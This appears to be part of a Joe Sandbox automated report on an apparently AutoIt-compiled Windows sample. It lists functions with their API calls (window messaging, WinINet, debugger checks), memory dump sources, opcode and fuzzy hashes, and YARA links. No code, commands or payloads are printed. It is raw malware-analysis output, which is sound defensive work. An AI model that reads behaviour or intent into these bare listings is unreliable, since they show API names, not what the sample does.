                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: a85c77e849914958cc07575a2baa6fd07fea8aef9704e680a392bb229209ce31
                                          • Instruction ID: 85adc9c54f44c2f9919f76cd45a16ff5611c50c2303160d2ff72903e46ec726a
                                          • Opcode Fuzzy Hash: a85c77e849914958cc07575a2baa6fd07fea8aef9704e680a392bb229209ce31
                                          • Instruction Fuzzy Hash: 3C513472518B449FD320AF14D886BABBBE8FFC5344F41885DF2D8411A2DB708529CB66
                                          Function 00969734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00904F0B: __fread_nolock.LIBCMT ref: 00904F29
                                          • _wcscmp.LIBCMT ref: 00969824
                                          • _wcscmp.LIBCMT ref: 00969837
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: 646c221de4b49c5e43ac81d9e34f256754de84b65655202347609aa92f020e72
                                          • Instruction ID: cb57298222e30ff4633daa0288874d37cf25067e9d02c795a74de8f0a125ec79
                                          • Opcode Fuzzy Hash: 646c221de4b49c5e43ac81d9e34f256754de84b65655202347609aa92f020e72
                                          • Instruction Fuzzy Hash: CA41B671A0421ABADF209BA4CC45FEFB7BDDF85714F010469FA04E7181DA75A9058B61
                                          Function 0097258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0097259E
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009725D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 69026a85e199a56d0798b4c36d13b10c39b852cf6463b535f5193f72a166a1ec
                                          • Instruction ID: 0f83f1e3eb202b6caeacf43a4fd335dfd9ac92cff135e3ead497acf65aee009c
                                          • Opcode Fuzzy Hash: 69026a85e199a56d0798b4c36d13b10c39b852cf6463b535f5193f72a166a1ec
                                          • Instruction Fuzzy Hash: 82310571D10119AFCF11AFA0DC85EEEBBB8FF48350F10405AF918A6162EB315956DB60
                                          Function 00987A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00987B61
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00987B76
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          • Opcode ID: 5e19d9192f71df16fd06e48ac1aa09bd267280614fc805b39a6aff7ae32c6f4e
                                          • Instruction ID: 64ef3404e22867c962461adeb44de54db7af89f4788cd85dbcb731853aabbb13
                                          • Opcode Fuzzy Hash: 5e19d9192f71df16fd06e48ac1aa09bd267280614fc805b39a6aff7ae32c6f4e
                                          • Instruction Fuzzy Hash: 9841F874A052099FDB14DFA4C981BEABBF9FB09300F24056AE904EB391D770E951DFA0
                                          Function 00986A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00986B17
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00986B53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: c8b277657d4261e2bbafd0324a48ab49b4dcd39ec147b81092247c850099d5b2
                                          • Instruction ID: 460f343a5ce1203dcb784869578b81a25d74369e20d635cec603811bc9a58db4
                                          • Opcode Fuzzy Hash: c8b277657d4261e2bbafd0324a48ab49b4dcd39ec147b81092247c850099d5b2
                                          • Instruction Fuzzy Hash: B1319E71210604AEDB10AF64CC81FFB73ADFF88764F109619F9A5D7290DA31AC81D760
                                          Function 009628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00962911
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0096294C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 21e0b46b0c0170ee35f2b5b1631778a73ae9c9dba468846f4ddb8c52c47a1de6
                                          • Instruction ID: d08e2abd077f633065afdec4a6a295aaf0f5c782839edf130ca90f3bff9fecf9
                                          • Opcode Fuzzy Hash: 21e0b46b0c0170ee35f2b5b1631778a73ae9c9dba468846f4ddb8c52c47a1de6
                                          • Instruction Fuzzy Hash: 9031F831A007059FEB24CF58DE45BEEBBFCEF85350F180429E985AB1A1DB709940CB51
                                          Function 009739E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • __snwprintf.LIBCMT ref: 00973A66
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __snwprintf_memmove
                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                          • API String ID: 3506404897-2584243854
                                          • Opcode ID: 048fead6db051e20da9653c6b4323c5bbfd6313796ac6ca017470be89e34cea5
                                          • Instruction ID: 62c2dd7b2bb0a6ead7b488ee305a1f5d5c59debe4a55de66a7fa0da63b82fedd
                                          • Opcode Fuzzy Hash: 048fead6db051e20da9653c6b4323c5bbfd6313796ac6ca017470be89e34cea5
                                          • Instruction Fuzzy Hash: 15219371A04219AFCF14EFA4CC82BAEB7B9AF88710F408454F449A7281DB30EA45DB61
                                          Function 009866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00986761
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0098676C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 6f8f25fb16f016f5e86bbade83132f7cb8fbe28b1e3802085e501f6412bcd14e
                                          • Instruction ID: 4470d0c2b40d84ba1d374558fcddc49e36acb88fb5b36932d1df0338821490c3
                                          • Opcode Fuzzy Hash: 6f8f25fb16f016f5e86bbade83132f7cb8fbe28b1e3802085e501f6412bcd14e
                                          • Instruction Fuzzy Hash: 3A118275210208AFEF11AF54DC81EAB376EEB88368F114129F9149B390D675DC5197A0
                                          Function 00986C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00901D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00901D73
                                            • Part of subcall function 00901D35: GetStockObject.GDI32(00000011), ref: 00901D87
                                            • Part of subcall function 00901D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00901D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00986C71
                                          • GetSysColor.USER32(00000012), ref: 00986C8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 8f018752c6543f6a9c07cc9bfc7c20862d0d9992017ed1abe4a03d95038400ef
                                          • Instruction ID: 6fdfebfa90fa2e1663dba7e8fd8daa9d4c479319aeabc5c48fcd9693278da6e7
                                          • Opcode Fuzzy Hash: 8f018752c6543f6a9c07cc9bfc7c20862d0d9992017ed1abe4a03d95038400ef
                                          • Instruction Fuzzy Hash: 2E2129B2620209AFDF04EFA8CC45EFA7BA8FB48315F004629FA95D3250D635E850DB60
                                          Function 00986920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 009869A2
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009869B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 425e559e06c2a0b9bc7a48b923122815da81cd7f8ade84cc69516fda19526f26
                                          • Instruction ID: 956b2608609c61cb9ca23811e24b6b2ec84dd4e7a2d3c626b00ba92afda545c1
                                          • Opcode Fuzzy Hash: 425e559e06c2a0b9bc7a48b923122815da81cd7f8ade84cc69516fda19526f26
                                          • Instruction Fuzzy Hash: 2A118F71510208ABEB10AF64DC55EEB37ADEB45378F604728F9A59B2E0C736DC90A760
                                          Function 009629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00962A22
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00962A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 0c1f0e1a4286531acf702921ff3998e6ab8156f55c0b9e97fa017af218bc035c
                                          • Instruction ID: e8805722f8df47ac0072bf9b8c36f3c2c41b20b9e3c608d23a2652eac96b3200
                                          • Opcode Fuzzy Hash: 0c1f0e1a4286531acf702921ff3998e6ab8156f55c0b9e97fa017af218bc035c
                                          • Instruction Fuzzy Hash: 3C11DD32D15A14ABCB30DFD8D844BEA73ACAB85344F054021E999FB2E0D7B0AD0AC791
                                          Function 009721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0097222C
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00972255
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: df25db5ea1bb442ff41a2c7fe52a17e0800232c2f9eae3d94fe356ea6929d230
                                          • Instruction ID: dbe1fae73cf9e1ee07f4b0537e4d983bebfa25463740ae2071014db23f8798af
                                          • Opcode Fuzzy Hash: df25db5ea1bb442ff41a2c7fe52a17e0800232c2f9eae3d94fe356ea6929d230
                                          • Instruction Fuzzy Hash: 8E110671611225BADB288F118C94EF7FBACFF0A351F10C62AF52846101D2709950D6F0
                                          Function 00958E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00958E73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 10bb6a9bb7d031f4bd8dbf79a5a3a61d45ae98ccda2a7db850300ae7d7a7c883
                                          • Instruction ID: 66477966a14f1f9fee7db2ee3099c74885b6d48a547c1c06c9e805f308ed642b
                                          • Opcode Fuzzy Hash: 10bb6a9bb7d031f4bd8dbf79a5a3a61d45ae98ccda2a7db850300ae7d7a7c883
                                          • Instruction Fuzzy Hash: 7201D271A01218AFCF14FBA1CC529FF7369AF81320B100A19BC31672D1DE31580CC750
                                          Function 00968D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 5641bcdfc9267c21821f2a8957016898fbe158a5ed90438b7aa1d51943ce65c8
                                          • Instruction ID: 3f0e587211f13b185aca36401e153cdac5500341a98600fa35bdd4622efa4dc9
                                          • Opcode Fuzzy Hash: 5641bcdfc9267c21821f2a8957016898fbe158a5ed90438b7aa1d51943ce65c8
                                          • Instruction Fuzzy Hash: F801F9718042287EDB18CAA8D816FFE7BFCDB15311F00459AF552D21C1E874E6088760
                                          Function 00958CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00958D6B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 89a24dbde06a5f41452e8d4a72cdfaeb5bbb0bdc1c913ab613d25b50049a8e86
                                          • Instruction ID: 0de6a38f2ee638b479db12d0840ff903f84a823676eef5bb3bdc81c6b3abd098
                                          • Opcode Fuzzy Hash: 89a24dbde06a5f41452e8d4a72cdfaeb5bbb0bdc1c913ab613d25b50049a8e86
                                          • Instruction Fuzzy Hash: 0801BCB1A41108AFCF14EBE2C992BFFB3A89F95351F100529B806772E1DE245A0C9761
                                          Function 00958D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00958DEE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 962e4b45fdf712be20837b7ab90df768d2d7ece2deea1ffe3b8679deaf3cf6e7
                                          • Instruction ID: c79fa98cda81a4f2c85b0e05369c5d90e09e908c5b136d7650fc3462c2fde63d
                                          • Opcode Fuzzy Hash: 962e4b45fdf712be20837b7ab90df768d2d7ece2deea1ffe3b8679deaf3cf6e7
                                          • Instruction Fuzzy Hash: 3301DBB1A41108ABDF10EAE6CA82BFFB3AC8B51311F100525BC06B32D2DA255E0CE771
                                          Function 00964F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 06750b858170b4fad51fc3d960e9e43d4c9a4518dfcfd4bb98a0b2385a18758f
                                          • Instruction ID: 5d3894d548089db12505c79676c526d5d813874a22009e89f7b7c1bd352620f9
                                          • Opcode Fuzzy Hash: 06750b858170b4fad51fc3d960e9e43d4c9a4518dfcfd4bb98a0b2385a18758f
                                          • Instruction Fuzzy Hash: 09E0D832A042382BE7209B99AC49FA7F7ACEB95B70F100067FD04D7151D960AA45C7E0
                                          Function 0093B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0093B314: _memset.LIBCMT ref: 0093B321
                                            • Part of subcall function 00920940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0093B2F0,?,?,?,0090100A), ref: 00920945
                                          • IsDebuggerPresent.KERNEL32(?,?,?,0090100A), ref: 0093B2F4
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0090100A), ref: 0093B303
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0093B2FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
